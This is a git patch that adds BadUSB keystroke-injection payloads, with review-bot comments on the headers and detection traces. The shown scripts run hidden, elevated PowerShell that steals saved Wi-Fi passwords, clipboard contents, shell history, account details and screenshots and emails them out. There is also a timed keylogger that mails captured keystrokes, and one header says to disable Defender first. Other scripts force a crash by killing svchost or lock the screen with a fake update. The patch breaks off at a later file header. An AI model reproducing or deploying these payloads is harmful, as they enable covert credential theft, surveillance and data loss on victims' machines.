From df9547205ea1ec7d8651de59e19ad5983d7670e6 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:18:54 +0000 Subject: [PATCH] Add files via upload --- OSINT/Email System & User Information.txt | 56 ++ OSINT/Email System Info with Screenshot.txt | 61 +++ ...stalled Programs and Eventlogs to File.txt | 26 + OSINT/Keylogger to Email.txt | 484 ++++++++++++++++++ Pranks/5 second Screen Kill.txt | 20 + Pranks/BSOD.txt | 21 + Pranks/Dsktop Shortcut Spammer.txt | 24 + Pranks/Invoke Fake Update (.vbs).txt | 44 ++ Pranks/Rickroll with Max Volume spam.txt | 51 ++ Pranks/Start Windows-93 (parody edition).txt | 33 ++ Tools/Add Exclusion C-drive.txt | 23 + Tools/Base64 Decode & Execute.txt | 30 ++ Tools/Disable RT-Protection.txt | 30 ++ Tools/Download-Execute from Run Prompt.txt | 23 + Tools/Set US Keyboard & System Language.txt | 30 ++ Tools/Simple NetCat Client.txt | 28 + 16 files changed, 984 insertions(+) create mode 100644 OSINT/Email System & User Information.txt create mode 100644 OSINT/Email System Info with Screenshot.txt create mode 100644 OSINT/Installed Programs and Eventlogs to File.txt create mode 100644 OSINT/Keylogger to Email.txt create mode 100644 Pranks/5 second Screen Kill.txt create mode 100644 Pranks/BSOD.txt create mode 100644 Pranks/Dsktop Shortcut Spammer.txt create mode 100644 Pranks/Invoke Fake Update (.vbs).txt create mode 100644 Pranks/Rickroll with Max Volume spam.txt create mode 100644 Pranks/Start Windows-93 (parody edition).txt create mode 100644 Tools/Add Exclusion C-drive.txt create mode 100644 Tools/Base64 Decode & Execute.txt create mode 100644 Tools/Disable RT-Protection.txt create mode 100644 Tools/Download-Execute from Run Prompt.txt create mode 100644 Tools/Set US Keyboard & System Language.txt create mode 100644 Tools/Simple NetCat Client.txt 
diff --git a/OSINT/Email System & User Information.txt b/OSINT/Email System & User Information.txt
new file mode 100644
index 0000000..1e823de
--- /dev/null
+++ b/OSINT/Email System & User Information.txt
@@ -0,0 +1,56 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" + +REM main powershell code +ENTER +DELAY 100 +STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING 
;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) + +STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 1;exit +ENTER \ No newline at end of file 
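Review bot: The REM header describes this payload as gathering "user and system information", but the typed PowerShell also reads saved Wi-Fi keys (`netsh wlan show profiles name=$ssid key=clear`), the clipboard and the PSReadLine `ConsoleHost_history.txt`, and it leaves everything in `$env:temp\sys.txt` after mailing it. The header should say so, e.g. `REM Collects: user accounts, public IP, saved Wi-Fi keys, clipboard, PowerShell history; writes %temp%\sys.txt and does not delete it`. The same gap applies to the next file, `Email System Info with Screenshot.txt`. For anyone triaging a host, the traces visible in this hunk are a `powershell -W Hidden -Exec Bypass` started elevated from the Run dialog (CTRL-SHIFT ENTER, then ALT y), the `key=clear` netsh calls, and SMTP to `smtp.outlook.com` on port 587 from powershell.exe.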
diff --git a/OSINT/Email System Info with Screenshot.txt b/OSINT/Email System Info with Screenshot.txt
new file mode 100644
index 0000000..4aa9f42
--- /dev/null
+++ b/OSINT/Email System Info with Screenshot.txt
@@ -0,0 +1,61 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* +REM TURN OFF RT-PROTECTION BEFORE RUNNING + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE" + +REM main powershell code +STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s 
-NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing +STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top +STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) +STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, 
$bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) + +STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) +STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 10;exit +ENTER \ No newline at end of file diff --git a/OSINT/Installed Programs and Eventlogs to File.txt b/OSINT/Installed Programs and Eventlogs to File.txt new file mode 100644 index 0000000..25052e0 --- /dev/null +++ b/OSINT/Installed Programs and Eventlogs to File.txt 
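Review bot: In `OSINT/Email System Info with Screenshot.txt`, the `REM Title:` and `REM Description:` lines are copied unchanged from `Email System & User Information.txt` and do not mention the screen capture this variant adds, which is saved to `$env:temp\SC.png` and attached to the mail. Suggest `REM Title: Email System Info with Screenshot` and a description that names the screenshot and the two files left in `%temp%`. The header's own note says Defender blocked the script when tested and tells the operator to turn real-time protection off first, so on a real host a real-time-protection change shortly before this activity is a useful correlation point.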
@@ -0,0 +1,26 @@ +REM Title: Programs and Eventlogs to File +REM Author: @beigeworm +REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM the main powershell script. +STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath +STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn +STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} +STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append +STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} +STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append +STRING ;sleep 30;exit +ENTER diff --git a/OSINT/Keylogger to Email.txt b/OSINT/Keylogger to Email.txt new file mode 100644 index 0000000..65d1e41 --- /dev/null +++ b/OSINT/Keylogger to Email.txt 
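Review bot: In `OSINT/Installed Programs and Eventlogs to File.txt`, the variable `$removed` is misleading: it is filled from `HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*`, which lists programs that are currently installed, so a name such as `$uninstallEntries` would describe it. The description also says only "Windows Eventlogs", while the code pulls Security-log events 4624 and 4634 (logon/logoff) and System-log events 12 and 13 into `$env:temp\Osint-<date>.txt` and leaves the file there; a REM line stating that would make the footprint clear. Separately, enumerating `Win32_Product` is known to make Windows Installer run a consistency check on each package, which shows up as a burst of MsiInstaller events in the Application log.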
@@ -0,0 +1,484 @@ +REM Title: Email System & User Info (old) +REM Author: @beigeworm +REM Description: Uses Powershell to gather system info and send it via Email. +REM Target: Windows 10 + +REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types) +REM this is a quick and dirty fix that i will revise in the near future. + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER 
+STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl +ENTER +STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. 
(Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE 
+ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER + diff --git a/Pranks/5 second Screen Kill.txt b/Pranks/5 second Screen Kill.txt new file mode 100644 index 0000000..ff855f8 --- /dev/null +++ b/Pranks/5 second Screen Kill.txt 
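Review bot: In `OSINT/Keylogger to Email.txt`, the header is copied from another payload (`REM Title: Email System & User Info (old)`, "gather system info") and does not describe what this file does. The script it types into Notepad polls `GetAsyncKeyState` through an `Add-Type` P/Invoke wrapper, appends the captured characters to `$env:temp\log.txt`, and mails that file out on the `$RunTime` interval. The title and description should match the file name, e.g. `REM Title: Keylogger to Email`. For detection, the artefacts visible here are `txtlog.ps1` and `log.txt` in `%temp%`, a hidden `powershell ... -Exec Bypass` launched from the Run dialog, and a PowerShell `Add-Type` importing `GetAsyncKeyState` from user32.dll, which script block logging records if it is enabled.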
@@ -0,0 +1,20 @@ +REM Title: 5 Second Display Kill +REM Author: @beigeworm +REM Description: Uses Powershell to kill all displays for a short period of time. +REM Target: Windows 10,11 + + +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage +STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit +ENTER diff --git a/Pranks/BSOD.txt b/Pranks/BSOD.txt new file mode 100644 index 0000000..edb5ba8 --- /dev/null +++ b/Pranks/BSOD.txt @@ -0,0 +1,21 @@ +REM Title: Invoke BSOD +REM Author: @beigeworm +REM Description: This will open powershell and cause a blue screen. +REM Target: Windows 10 + +REM ***This is a dangerous script - Be Careful!!!*** + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING taskkill /f /im svchost.exe +ENTER diff --git a/Pranks/Dsktop Shortcut Spammer.txt b/Pranks/Dsktop Shortcut Spammer.txt new file mode 100644 index 0000000..bf7a47c --- /dev/null +++ b/Pranks/Dsktop Shortcut Spammer.txt 
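Review bot: In `Pranks/BSOD.txt`, the header's only caution is "Be Careful", which understates `taskkill /f /im svchost.exe`: force-killing the service host processes from an elevated shell takes the machine down without a clean shutdown, so unsaved work in every open application is lost. Suggest stating the effect in the header, e.g. `REM Effect: forces an unclean crash/restart; all unsaved data on the target is lost`, and moving the file out of `Pranks/`.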
@@ -0,0 +1,24 @@ +REM Title: Dsktop Shortcut Spammer +REM Author: @beigeworm +REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace 200 with the number of shortcuts you want to create.* +STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" + +REM rest of the script. +STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") +STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" +STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit \ No newline at end of file diff --git a/Pranks/Invoke Fake Update (.vbs).txt b/Pranks/Invoke Fake Update (.vbs).txt new file mode 100644 index 0000000..c3af84b --- /dev/null +++ b/Pranks/Invoke Fake Update (.vbs).txt 
@@ -0,0 +1,44 @@ +REM Title: Invoke Fake Windows Update +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 200 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to start chrome and go fullscreen. +STRING cmd +ENTER +STRING cd $env:temp +ENTER +STRING copy con update.vbs +ENTER +STRING Set WshShell = WScript.CreateObject("WScript.Shell") +ENTER +STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False +ENTER +STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" +ENTER +STRING WScript.Sleep 200 +ENTER +STRING WshShell.SendKeys "{F11}" +ENTER +CTRL z +ENTER +STRING start update.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + + diff --git a/Pranks/Rickroll with Max Volume spam.txt b/Pranks/Rickroll with Max Volume spam.txt new file mode 100644 index 0000000..220d077 --- /dev/null +++ b/Pranks/Rickroll with Max Volume spam.txt 
